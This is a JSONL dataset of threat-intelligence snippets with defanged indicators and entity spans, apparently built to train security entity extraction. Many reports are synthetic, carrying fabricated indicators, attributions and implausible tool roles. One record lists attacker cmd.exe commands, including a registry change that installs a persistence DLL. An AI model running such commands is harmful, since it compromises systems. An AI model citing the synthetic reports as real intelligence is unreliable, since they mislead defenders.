Additional C2 domains include update-service-ms[ . ]com and cdn-office365[ . ]net. Associated email addresses used in phishing: invoice@update-service-ms[.]com and admin@cdn-office365[ . ]net.", "spans": {"Malware: QakBot": [[41, 47], [512, 518]], "Malware: Qbot": [[63, 67]], "Malware: Pinkslipbot": [[72, 83]], "Organization: FBI": [[12, 15]], "Indicator: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "Indicator: 203.0.113.42": [[268, 286]], "Indicator: 198.51.100.73": [[288, 307]], "Indicator: 192.0.2.156": [[313, 342]], "System: OneNote": [[387, 394]], "Indicator: hxxp://203.0.113.42/updates/kb5034441.dll": [[463, 510]], "System: wermgr.exe": [[682, 692]], "System: explorer.exe": [[697, 709]], "Indicator: update-service-ms.com": [[753, 778]], "Indicator: cdn-office365.net": [[783, 804]], "Indicator: invoice@update-service-ms.com": [[851, 882]], "Indicator: admin@cdn-office365.net": [[887, 914]]}, "info": {"id": "malware_00018", "source": "defanged_augment"}} {"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 172[.]198[.]228[.]170\n- 172 [ . ] 131 [ . ] 196 [ . ] 209\n- 192[.]171[.]127[.]24\n- storagegateway[ . ]site\n- logincloud[.]cc\nURLs:\n- hxxps://portal-cache[.]link/panel/index.html\n- hxxp://synccache[.]site/callback\nEmail Senders:\n- account@secure-verify[.]net\n- alert@urgent-notice[ . 
]online\nFile Indicators:\n- MD5: 29a013da185ffed3cdc81f49d9f45281\n- SHA256: 8c48ea123505cf95c2dd8af118eda22c1957924148290661245a10abbbc56c65\n- Drop path: C:\\Users\\admin\\Downloads\\payload.bin", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 172.198.228.170": [[62, 83]], "Indicator: 172.131.196.209": [[86, 119]], "Indicator: 192.171.127.24": [[122, 142]], "Indicator: storagegateway.site": [[145, 168]], "Indicator: logincloud.cc": [[171, 186]], "Indicator: hxxps://portal-cache.link/panel/index.html": [[195, 239]], "Indicator: http://synccache.site/callback": [[242, 274]], "Indicator: account@secure-verify.net": [[292, 319]], "Indicator: alert@urgent-notice.online": [[322, 352]], "Indicator: 29a013da185ffed3cdc81f49d9f45281": [[377, 409]], "Indicator: 8c48ea123505cf95c2dd8af118eda22c1957924148290661245a10abbbc56c65": [[420, 484]]}, "info": {"id": "synth_v2_01362", "source": "defanged_augment"}} {"text": "Malware Analysis Report: IcedID (SHA256: 4bac1f77ec283db1640c35398e9b367869b9ae3b7608bcd4922de1031634bf98). Upon execution on Zyxel USG, the sample creates C:\\Users\\Public\\Documents\\implant.so and injects into legitimate processes. Network analysis shows beaconing to 172[.]63[.]77[.]53 every 60 seconds and DNS queries to loginsync[.]link. The second stage was fetched from hxxps://updateauth[.]io/panel/index.html and written to /dev/shm/helper.sh. The payload uses PowerView-style techniques for defense evasion. 
A secondary hash (MD5: 73419d10cab2520407d7090ec183bd2b) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: 4bac1f77ec283db1640c35398e9b367869b9ae3b7608bcd4922de1031634bf98": [[41, 105]], "System: Zyxel USG": [[126, 135]], "Indicator: 172.63.77.53": [[268, 286]], "Indicator: loginsync.link": [[323, 339]], "Indicator: https://updateauth.io/panel/index.html": [[375, 415]], "Indicator: 73419d10cab2520407d7090ec183bd2b": [[539, 571]]}, "info": {"id": "synth_v2_00506", "source": "defanged_augment"}} {"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . The archive contains an [.]exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"Vulnerability: CVE-2017-11882": [[118, 132]], "Vulnerability: (CVE-2017-11882)": [[227, 243]], "Indicator: .exe file": [[290, 301]], "Indicator: Microsoft Word file": [[329, 348]]}, "info": {"id": "cyberner_stix_train_006617", "source": "defanged_augment"}} {"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 192 [ . ] 123 [ . ] 212 [ . ] 125\n- 128[.]234[.]237[.]117\n- 172 [ . ] 175 [ . ] 233 [ . ] 97\n- mailmail[.]info\n- staticcdn[ . ]xyz\nURLs:\n- hxxps://static-storage[ . ]link/wp-content/uploads/doc.php\n- hxxps://authauth[ . ]dev/download/update.exe\nEmail Senders:\n- service@document-share[ . 
]link\n- billing@document-share[.]link\nFile Indicators:\n- MD5: c20ee49afe74aa2ff060cebbabbaca7a\n- SHA1: 8a85ee193e4a86f9675425d2670695d602a1691a\n- Drop path: /opt/app/bin/csrss.exe", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 192.123.212.125": [[54, 87]], "Indicator: 128.234.237.117": [[90, 111]], "Indicator: 172.175.233.97": [[114, 146]], "Indicator: mailmail.info": [[149, 164]], "Indicator: staticcdn.xyz": [[167, 184]], "Indicator: https://static-storage.link/wp-content/uploads/doc.php": [[193, 251]], "Indicator: hxxps://authauth.dev/download/update.exe": [[254, 298]], "Indicator: service@document-share.link": [[316, 347]], "Indicator: billing@document-share.link": [[350, 379]], "Indicator: c20ee49afe74aa2ff060cebbabbaca7a": [[404, 436]], "Indicator: 8a85ee193e4a86f9675425d2670695d602a1691a": [[445, 485]]}, "info": {"id": "synth_v2_01457", "source": "defanged_augment"}} {"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate[ . ]scr .", "spans": {"Organization: Kaspersky": [[92, 101]], "Malware: KONNI": [[253, 258]], "Indicator: RC_Office_Coordination_Associate.scr": [[323, 363]]}, "info": {"id": "cyberner_stix_train_006128", "source": "defanged_augment"}} {"text": "Github's CodeQL action is provided to run CodeQL-based code scanning on non-GitHub CI/CD systems and requires a GitHub access token to connect to a GitHub repository. The runner and its documentation previously suggested passing the GitHub token as a command-line parameter to the process instead of reading it from a file, standard input, or an environment variable. 
This approach made the token visible to other processes on the same machine, for example in the output of the `ps` command. If the CI system publicly exposes the output of `ps`, for example by logging the output, then the GitHub access token can be exposed beyond the scope intended. Users of the CodeQL runner on 3rd-party systems, who are passing a GitHub token via the `--github-auth` flag, are affected. This applies to both GitHub[ . ]com and GitHub Enterprise users. Users of the CodeQL Action on GitHub Actions are not affected. The `--github-auth` flag is now considered insecure and deprecated. The undocumented `--external-repository-token` flag has been removed. To securely provide a GitHub access token to the CodeQL runner, users should **do one of the following instead**: Use the `--github-auth-stdin` flag and pass the token on the command line via standard input OR set the `GITHUB_TOKEN` environment variable to contain the token, then call the command without passing in the token. The old flag remains present for backwards compatibility with existing workflows. If the user tries to specify an access token using the `--github-auth` flag, there is a deprecation warning printed to the terminal that directs the user to one of the above options. All CodeQL runner releases codeql-bundle-20210304 onwards contain the patches. We recommend updating to a recent version of the CodeQL runner, storing a token in your CI system's secret storage mechanism, and passing the token to the CodeQL runner using `--github-auth-stdin` or the `GITHUB_TOKEN` environment variable. 
If still using the old flag, ensure that process output, such as from `ps`, is not persisted in CI logs.", "spans": {"Indicator: GitHub.com": [[797, 811]], "Organization: GitHub": [[76, 82], [112, 118], [148, 154], [233, 239], [590, 596], [719, 725], [816, 822], [871, 877], [1064, 1070]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-32638"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 73 [ . ] 177 [ . ] 206 [ . ] 243, the Qualys IR team identified WarmCookie running as C:\\Windows\\Tasks\\sam.hive. The threat actor, believed to be Diamond Sleet, used Nmap for credential harvesting and Mimikatz for lateral movement. Exfiltrated data was sent to portal-data[.]xyz and proxy-data[.]io. The initial dropper (MD5: acff08b676873260f3fdfac2ce026b4b) was delivered via a phishing email from billing@identity-verify[.]cc. A second C2 node was observed at 211 [ . ] 6 [ . ] 241 [ . ] 168, with a persistence mechanism writing to /opt/app/bin/chrome_helper.exe.", "spans": {"Indicator: 73.177.206.243": [[64, 96]], "Organization: Qualys": [[102, 108]], "Malware: WarmCookie": [[128, 138]], "Indicator: portal-data.xyz": [[325, 342]], "Indicator: proxy-data.io": [[347, 362]], "Indicator: acff08b676873260f3fdfac2ce026b4b": [[390, 422]], "Indicator: billing@identity-verify.cc": [[464, 492]], "Indicator: 211.6.241.168": [[527, 558]]}, "info": {"id": "synth_v2_00308", "source": "defanged_augment"}} {"text": "Europol published a threat intelligence report linking Midnight Blizzard to a new campaign exploiting CVE-2020-17296 in Ubuntu 22.04. The attackers deployed Qbot via Hashcat, establishing C2 communication with 163 [ . ] 183 [ . ] 32 [ . ] 204 and storagebackup[ . ]tech. A secondary payload was downloaded from hxxps://cache-proxy[ . ]link/admin/config. The malware binary (SHA256: 5ab115bd718dd63abb977e65564b14729ceca6875aae2a98d2b49c7f5958fad4) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\taskhost.exe. 
Phishing emails were sent from updates@phishing-domain[.]com targeting enterprise users. A backup C2 server was identified at 56 [ . ] 219 [ . ] 108 [ . ] 127.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2020-17296": [[102, 116]], "System: Ubuntu 22.04": [[120, 132]], "Malware: Qbot": [[157, 161]], "Indicator: 163.183.32.204": [[210, 242]], "Indicator: storagebackup.tech": [[247, 269]], "Indicator: https://cache-proxy.link/admin/config": [[311, 352]], "Indicator: 5ab115bd718dd63abb977e65564b14729ceca6875aae2a98d2b49c7f5958fad4": [[382, 446]], "Indicator: updates@phishing-domain.com": [[542, 571]], "Indicator: 56.219.108.127": [[637, 669]]}, "info": {"id": "synth_v2_00099", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Dridex (SHA1: 9361bc61bb02ae5363238069c39f4417113531ec). Upon execution on Microsoft Exchange, the sample creates C:\\Users\\Public\\Documents\\backdoor.elf and injects into legitimate processes. Network analysis shows beaconing to 190[.]26[.]70[.]18 every 60 seconds and DNS queries to cache-update[ . ]net. The second stage was fetched from hxxps://cdnproxy[ . ]link/callback and written to C:\\Users\\admin\\Downloads\\shell.php. The payload uses Certutil-style techniques for defense evasion. A secondary hash (MD5: 51aebf756cf2e3378df7787c31b5345e) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 9361bc61bb02ae5363238069c39f4417113531ec": [[39, 79]], "System: Microsoft Exchange": [[100, 118]], "Indicator: 190.26.70.18": [[253, 271]], "Indicator: cache-update.net": [[308, 328]], "Indicator: https://cdnproxy.link/callback": [[364, 398]], "Indicator: 51aebf756cf2e3378df7787c31b5345e": [[537, 569]]}, "info": {"id": "synth_v2_00628", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed PowerView artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of Havoc. 
Registry modifications pointed to persistence via /var/tmp/config.dat. Network forensics identified connections to 31 [ . ] 107 [ . ] 26 [ . ] 210 and cdn-login[ . ]org. Email headers traced the initial vector to contact@mail-service[.]info. File C:\\ProgramData\\helper.sh (MD5: 29bf7c2cc699db507cc1328e51191d88) was identified as the initial dropper. A staging URL hxxp://mail-static[ . ]online/login resolved to 186[.]101[.]140[.]178. Secondary artifact hash: SHA1: 0422fe108e7f404a84f408a4dd90614cb92295e3.", "spans": {"Indicator: 31.107.26.210": [[286, 317]], "Indicator: cdn-login.org": [[322, 339]], "Indicator: contact@mail-service.info": [[384, 411]], "Indicator: 29bf7c2cc699db507cc1328e51191d88": [[449, 481]], "Indicator: hxxp://mail-static.online/login": [[536, 571]], "Indicator: 186.101.140.178": [[584, 605]], "Indicator: 0422fe108e7f404a84f408a4dd90614cb92295e3": [[638, 678]]}, "info": {"id": "synth_v2_01279", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2026-10212 is a critical CSRF vulnerability affecting MOVEit Transfer. Trend Micro confirmed active exploitation by Charming Kitten in the wild. Exploitation delivers Play (MD5: d7dd3ace432cec804d42f5c033ae6b47) which is dropped to C:\\Windows\\Tasks\\loader.exe. The exploit payload is hosted at hxxps://secure-auth[ . ]online/panel/index.html and communicates to 10[.]204[.]133[.]78 for C2.", "spans": {"Vulnerability: CVE-2026-10212": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: MOVEit Transfer": [[82, 97]], "Organization: Trend Micro": [[99, 110]], "Malware: Play": [[195, 199]], "Indicator: d7dd3ace432cec804d42f5c033ae6b47": [[206, 238]], "Indicator: https://secure-auth.online/panel/index.html": [[322, 369]], "Indicator: 10.204.133.78": [[390, 409]]}, "info": {"id": "synth_v2_00738", "source": "defanged_augment"}} {"text": "The registrant information for kernel[ . 
]ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle[.]org was the same used for mydomain1607[ . ]com , chmail.ir .", "spans": {"Organization: email provider": [[96, 110]], "Indicator: kernel.ws": [[31, 44]], "Indicator: checkgoogle.org": [[135, 152]], "Indicator: mydomain1607.com": [[175, 195]]}, "info": {"id": "dnrti_train_001127", "source": "defanged_augment"}} {"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix[ . ]co[ . ]kr was registered in 2014 .", "spans": {"Indicator: softfix.co.kr": [[173, 194]]}, "info": {"id": "cyberner_stix_train_000087", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle Help Technologies product of Oracle Fusion Middleware (component: Web UIX). Supported versions that are affected are 11[.]1[.]1[.]9.0 and 12[.]2[.]1[.]3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Help Technologies. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Help Technologies, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Help Technologies accessible data as well as unauthorized update, insert or delete access to some of Oracle Help Technologies accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "spans": {"Indicator: 11.1.1.9": [[145, 159]], "Indicator: 12.2.1.3": [[166, 180]], "Organization: Oracle": [[21, 27], [57, 63], [292, 298], [435, 441], [633, 639], [741, 747]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14723"}} {"text": "A backdoor also known as: Worm.Theals W32/Theals.dam Worm.Theals.Win32.2 Win32.Trojan.WisdomEyes.16070401.9500.9975 Win32/VB.VOMRAe Win.Exploit.DCOM-5 Net-Worm.Win32.Theals.c Virus.Win32.Theals.vvbf Net.Worm.W32!c Virus.Win32.Theals_re.c Win32.Zombie.4214 BehavesLike[.]Win32[.]Virut[.]ch Worm/Theals.i W32/Theals.D Win32.Theals.bd.8704 Net-Worm.Win32.Theals.c Worm/Win32.Theals.C1456665 Virus.Win32.Stealth.c W32/Theals.C!worm.im Win32/Trojan.529", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.ch": [[256, 288]]}, "info": {"id": "cyner2_train_001351", "source": "defanged_augment"}} {"text": "Blog Post by Cisco Talos: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-33723 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from admin@identity-verify[.]cc delivering Conti. Post-compromise, the attackers deploy RedLine Stealer and use PowerView for reconnaissance. C2 infrastructure includes 68 [ . ] 9 [ . ] 59 [ . ] 13 and backup-portal[ . ]com. A staging server at hxxp://static-cloud[ . ]dev/secure/token hosts additional tooling. 
Key artifact: C:\\Users\\admin\\Downloads\\config.dat (SHA256: 1563c768f146f70543dc95a83e36c0623fd9de6607697482fd8521b0849f0232).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2025-33723": [[119, 133]], "System: MOVEit Transfer": [[142, 157]], "Indicator: admin@identity-verify.cc": [[233, 259]], "Malware: Conti": [[271, 276]], "Malware: RedLine Stealer": [[316, 331]], "Indicator: 68.9.59.13": [[397, 425]], "Indicator: backup-portal.com": [[430, 451]], "Indicator: hxxp://static-cloud.dev/secure/token": [[473, 513]], "Indicator: 1563c768f146f70543dc95a83e36c0623fd9de6607697482fd8521b0849f0232": [[599, 663]]}, "info": {"id": "synth_v2_01577", "source": "defanged_augment"}} {"text": "The malicious executables all called out to the same URLs on windowsnewupdates[.]com .", "spans": {"Indicator: windowsnewupdates.com": [[61, 84]]}, "info": {"id": "cyberner_stix_train_007068", "source": "defanged_augment"}} {"text": "public passive DNS data , in 2017 was used to host the domain server1cs[.]exodus[.]connexxa[.]it .", "spans": {"Indicator: server1cs.exodus.connexxa.it": [[62, 96]]}, "info": {"id": "cyner_train_001313", "source": "defanged_augment"}} {"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify[ . ]net .", "spans": {"Malware: SofacyCarberp": [[16, 29]], "Indicator: cdnverify.net": [[92, 109]]}, "info": {"id": "cyberner_stix_train_000370", "source": "defanged_augment"}} {"text": "A backdoor also known as: Backdoor.Tosct BKDR_WEBRV.A Win32.Trojan.WisdomEyes.16070401.9500.9995 BKDR_WEBRV.A W32/Trojan.FUQN-2612 W32.Trojan.Downloader Trojan.Heur.RP.EBE28B Backdoor:Win32/Tosct.A W32/Dloader[ . ]GQ!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Dloader.GQ": [[202, 216]]}, "info": {"id": "cyner2_train_007154", "source": "defanged_augment"}} {"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc[.]bat , xls[.]bat , xlsx[ . ]bat , ppt[ . ]bat , pptx[ . 
]bat , pdf[ . ]bat , and txt[ . ]bat .", "spans": {"Organization: CTU": [[0, 3]], "Indicator: doc.bat": [[67, 76]], "Indicator: xls.bat": [[79, 88]], "Indicator: xlsx.bat": [[91, 103]], "Indicator: ppt.bat": [[106, 117]], "Indicator: pptx.bat": [[120, 132]], "Indicator: pdf.bat": [[135, 146]], "Indicator: txt.bat": [[153, 164]]}, "info": {"id": "cyberner_stix_train_000214", "source": "defanged_augment"}} {"text": "A backdoor also known as: BDS/Iroffer.1221.5 Backdoor.Iroffer.AM W32/Iroffer.BC Trojan.Ioffer Backdoor.Win32.Iroffer.1221 Backdoor.Iroffer.1[.]2[.]2[.]1 W32/Iroffer.AM@bd BackDoor.Iroffer.1221 Backdoor.Win32.Iroffer.1221 W32/Iroffer.AM@bd Backdoor.Iroffer.1221.4098 Backdoor:Win32/Iroffer.1_221 Backdoor.Iroffer.1221 Win32/Iroffer.1222 Backdoor.Win32.Iroffer.1221 BackDoor.Iroffer.AD", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: 1.2.2.1": [[139, 152]]}, "info": {"id": "cyner2_train_003001", "source": "defanged_augment"}} {"text": "async-h1 is an asynchronous HTTP/1.1 parser for Rust (crates[.]io). There is a request smuggling vulnerability in async-h1 before version 2.3.0. This vulnerability affects any webserver that uses async-h1 behind a reverse proxy, including all such Tide applications. If the server does not read the body of a request which is longer than some buffer length, async-h1 will attempt to read a subsequent request from the body content starting at that offset into the body. One way to exploit this vulnerability would be for an adversary to craft a request such that the body contains a request that would not be noticed by a reverse proxy, allowing it to forge forwarded/x-forwarded headers. If an application trusted the authenticity of these headers, it could be misled by the smuggled request. 
Another potential concern with this vulnerability is that if a reverse proxy is sending multiple http clients' requests along the same keep-alive connection, it would be possible for the smuggled request to specify a long content and capture another user's request in its body. This content could be captured in a post request to an endpoint that allows the content to be subsequently retrieved by the adversary. This has been addressed in async-h1 2.3.0 and previous versions have been yanked.", "spans": {"Indicator: crates.io": [[54, 65]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-26281"}} {"text": "This led us to additional infrastructure for Zebrocy at 185 [ . ] 25 [ . ] 51 [ . ] 198 and 185 [ . ] 25 [ . ] 50 [ . ] 93 .", "spans": {"Malware: Zebrocy": [[45, 52]], "Indicator: 185.25.51.198": [[56, 87]], "Indicator: 185.25.50.93": [[92, 122]]}, "info": {"id": "cyberner_stix_train_000363", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at C:\\Users\\admin\\Desktop\\dropper.ps1. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /dev/shm/agent.py. Network forensics identified connections to 96[.]142[.]129[.]17 and cacherelay[.]com. Email headers traced the initial vector to confirm@mail-service[ . ]info. File C:\\Windows\\Temp\\helper.sh (SHA256: 13d365c4532896bac68852e075aa8b99d0165a1279454dbc8816723515da3a5f) was identified as the initial dropper. A staging URL hxxps://storageedge[.]com/secure/token resolved to 172[.]50[.]223[.]101. 
Secondary artifact hash: SHA256: dc8217c1ff77fad2583557d1499f6c685fb4ad6976693d5a287b83c41cb8a7f4.", "spans": {"Indicator: 96.142.129.17": [[298, 317]], "Indicator: cacherelay.com": [[322, 338]], "Indicator: confirm@mail-service.info": [[383, 412]], "Indicator: 13d365c4532896bac68852e075aa8b99d0165a1279454dbc8816723515da3a5f": [[454, 518]], "Indicator: hxxps://storageedge.com/secure/token": [[573, 611]], "Indicator: 172.50.223.101": [[624, 644]], "Indicator: dc8217c1ff77fad2583557d1499f6c685fb4ad6976693d5a287b83c41cb8a7f4": [[679, 743]]}, "info": {"id": "synth_v2_01251", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nARM: 9359/1: flush: check if the folio is reserved for no-mapping addresses\n\nSince commit a4d5613c4dc6 (\"arm: extend pfn_valid to take into account\nfreed memory map alignment\") changes the semantics of pfn_valid() to check\npresence of the memory map for a PFN. A valid page for an address which\nis reserved but not mapped by the kernel[1], the system crashed during\nsome uio test with the following memory layout:\n\n node 0: [mem 0x00000000c0a00000-0x00000000cc8fffff]\n node 0: [mem 0x00000000d0000000-0x00000000da1fffff]\n the uio layout is:0xc0900000, 0x100000\n\nthe crash backtrace like:\n\n Unable to handle kernel paging request at virtual address bff00000\n [...]\n CPU: 1 PID: 465 Comm: startapp.bin Tainted: G O 5.10.0 #1\n Hardware name: Generic DT based system\n PC is at b15_flush_kern_dcache_area+0x24/0x3c\n LR is at __sync_icache_dcache+0x6c/0x98\n [...]\n (b15_flush_kern_dcache_area) from (__sync_icache_dcache+0x6c/0x98)\n (__sync_icache_dcache) from (set_pte_at+0x28/0x54)\n (set_pte_at) from (remap_pfn_range+0x1a0/0x274)\n (remap_pfn_range) from (uio_mmap+0x184/0x1b8 [uio])\n (uio_mmap [uio]) from (__mmap_region+0x264/0x5f4)\n (__mmap_region) from (__do_mmap_mm+0x3ec/0x440)\n (__do_mmap_mm) from (do_mmap+0x50/0x58)\n (do_mmap) from (vm_mmap_pgoff+0xfc/0x188)\n 
(vm_mmap_pgoff) from (ksys_mmap_pgoff+0xac/0xc4)\n (ksys_mmap_pgoff) from (ret_fast_syscall+0x0/0x5c)\n Code: e0801001 e2423001 e1c00003 f57ff04f (ee070f3e)\n ---[ end trace 09cf0734c3805d52 ]---\n Kernel panic - not syncing: Fatal exception\n\nSo check if PG_reserved was set to solve this issue.\n\n[1]: hxxps://lore[ . ]kernel[ . ]org/lkml/Zbtdue57RO0QScJM@linux.ibm.com/", "spans": {"Indicator: https://lore.kernel.org/lkml/Zbtdue57RO0QScJM@linux.ibm.com/": [[1681, 1749]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-26947"}} {"text": "Phishing Campaign Report: INTERPOL identified a large-scale phishing operation. Emails originated from account@mail-service[ . ]info and report@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://cloudbackup[ . ]org/wp-content/uploads/doc.php which hosted a credential harvesting page on edgegateway[.]online. A secondary link hxxp://cache-relay[.]top/gate.php delivered RedLine Stealer (MD5: 3c5a69d7d426552b0b7e8bafa7fdc25d). The malware was saved to C:\\Users\\Public\\Documents\\agent.py and established C2 with 192 [ . ] 217 [ . ] 136 [ . ] 233.", "spans": {"Organization: INTERPOL": [[26, 34]], "Indicator: account@mail-service.info": [[103, 132]], "Indicator: report@phishing-domain.com": [[137, 167]], "Indicator: hxxps://cloudbackup.org/wp-content/uploads/doc.php": [[224, 278]], "Indicator: edgegateway.online": [[324, 344]], "Indicator: http://cache-relay.top/gate.php": [[363, 396]], "Malware: RedLine Stealer": [[407, 422]], "Indicator: 3c5a69d7d426552b0b7e8bafa7fdc25d": [[429, 461]], "Indicator: 192.217.136.233": [[548, 581]]}, "info": {"id": "synth_v2_01016", "source": "defanged_augment"}} {"text": "cmd[.]exe /c dir rasext[ . ]dll , cmd[ . ]exe /c dir msctfp[ . ]dat , cmd[ . ]exe /c tasklist /svc | findstr RasMan , cmd[.]exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext[ . 
]dll /f .", "spans": {"Indicator: cmd.exe": [[0, 9], [34, 45], [70, 81], [118, 127]], "Indicator: rasext.dll": [[17, 31], [224, 238]], "Indicator: msctfp.dat": [[53, 67]]}, "info": {"id": "cyberner_stix_train_006732", "source": "defanged_augment"}} {"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /var/tmp/loader.exe - SHA256: 0a05928a49b4a37219ddd89de71269ec113beed92be59803be9b5f08fcaccd47\nStage 2 loader at C:\\Users\\admin\\Downloads\\loader.exe - SHA1: 72f3968e91bcc323136dd30d85ae887382c487e2\nFinal payload at /etc/cron.d/update.dll - SHA1: 346f216583a1460bb97ebeee0e67f852d9770a45\nExfiltration module - MD5: f6c75c26890bae32e785b3c16b1dda08\nAll stages communicated with 37[.]237[.]169[.]1. Metasploit signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: 0a05928a49b4a37219ddd89de71269ec113beed92be59803be9b5f08fcaccd47": [[92, 156]], "Indicator: 72f3968e91bcc323136dd30d85ae887382c487e2": [[219, 259]], "Indicator: 346f216583a1460bb97ebeee0e67f852d9770a45": [[308, 348]], "Indicator: f6c75c26890bae32e785b3c16b1dda08": [[376, 408]], "Indicator: 37.237.169.1": [[438, 456]]}, "info": {"id": "synth_v2_01899", "source": "defanged_augment"}} {"text": "Volexity detected a multi-stage attack chain. The initial phishing email from security@account-update[.]xyz contained a link to hxxps://cloudgateway[ . ]top/login. This redirected to hxxps://cache-node[ . ]org/secure/token on relay-backup[.]net. A secondary email from it@account-update[ . ]xyz pointed to hxxp://node-auth[ . ]info/admin/config which delivered SmokeLoader. The final payload callback was hxxp://relaycdn[ . 
]org/callback resolving to 83[.]103[.]41[.]49 via cdngateway[.]com.", "spans": {"Organization: Volexity": [[0, 8]], "Indicator: security@account-update.xyz": [[78, 107]], "Indicator: hxxps://cloudgateway.top/login": [[128, 162]], "Indicator: https://cache-node.org/secure/token": [[183, 222]], "Indicator: relay-backup.net": [[226, 244]], "Indicator: it@account-update.xyz": [[269, 294]], "Indicator: http://node-auth.info/admin/config": [[306, 344]], "Malware: SmokeLoader": [[361, 372]], "Indicator: hxxp://relaycdn.org/callback": [[405, 437]], "Indicator: 83.103.41.49": [[451, 469]], "Indicator: cdngateway.com": [[474, 490]]}, "info": {"id": "synth_v2_01717", "source": "defanged_augment"}} {"text": "ESET Research detected a multi-stage attack chain. The initial phishing email from security@auth-check[.]org contained a link to hxxp://login-portal[ . ]io/assets/js/payload.js. This redirected to hxxp://nodeproxy[ . ]com/collect on portal-login[ . ]online. A secondary email from account@secure-verify[ . ]net pointed to hxxp://authgateway[.]top/panel/index.html which delivered Vidar. The final payload callback was hxxps://edge-backup[.]tech/panel/index.html resolving to 192 [ . ] 238 [ . ] 201 [ . ] 252 via clouddata[.]net.", "spans": {"Organization: ESET Research": [[0, 13]], "Indicator: security@auth-check.org": [[83, 108]], "Indicator: hxxp://login-portal.io/assets/js/payload.js": [[129, 176]], "Indicator: hxxp://nodeproxy.com/collect": [[197, 229]], "Indicator: portal-login.online": [[233, 256]], "Indicator: account@secure-verify.net": [[281, 310]], "Indicator: hxxp://authgateway.top/panel/index.html": [[322, 363]], "Malware: Vidar": [[380, 385]], "Indicator: https://edge-backup.tech/panel/index.html": [[418, 461]], "Indicator: 192.238.201.252": [[475, 508]], "Indicator: clouddata.net": [[513, 528]]}, "info": {"id": "synth_v2_01760", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. 
Emails originated from notification@urgent-notice[.]online and contact@auth-check[.]org, spoofing legitimate services. Victims were directed to hxxps://gatewaysecure[.]org/download/update.exe which hosted a credential harvesting page on update-mail[ . ]dev. A secondary link hxxp://secure-cloud[ . ]club/admin/config delivered NjRAT (SHA256: fd94894a16772fc852de488d158c774a62eacef12116e733614f9eaf93814fb9). The malware was saved to /tmp/svchost.exe and established C2 with 10 [ . ] 9 [ . ] 192 [ . ] 64.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: notification@urgent-notice.online": [[106, 141]], "Indicator: contact@auth-check.org": [[146, 170]], "Indicator: hxxps://gatewaysecure.org/download/update.exe": [[227, 274]], "Indicator: update-mail.dev": [[320, 339]], "Indicator: http://secure-cloud.club/admin/config": [[358, 399]], "Malware: NjRAT": [[410, 415]], "Indicator: fd94894a16772fc852de488d158c774a62eacef12116e733614f9eaf93814fb9": [[425, 489]], "Indicator: 10.9.192.64": [[558, 587]]}, "info": {"id": "synth_v2_00912", "source": "defanged_augment"}} {"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group 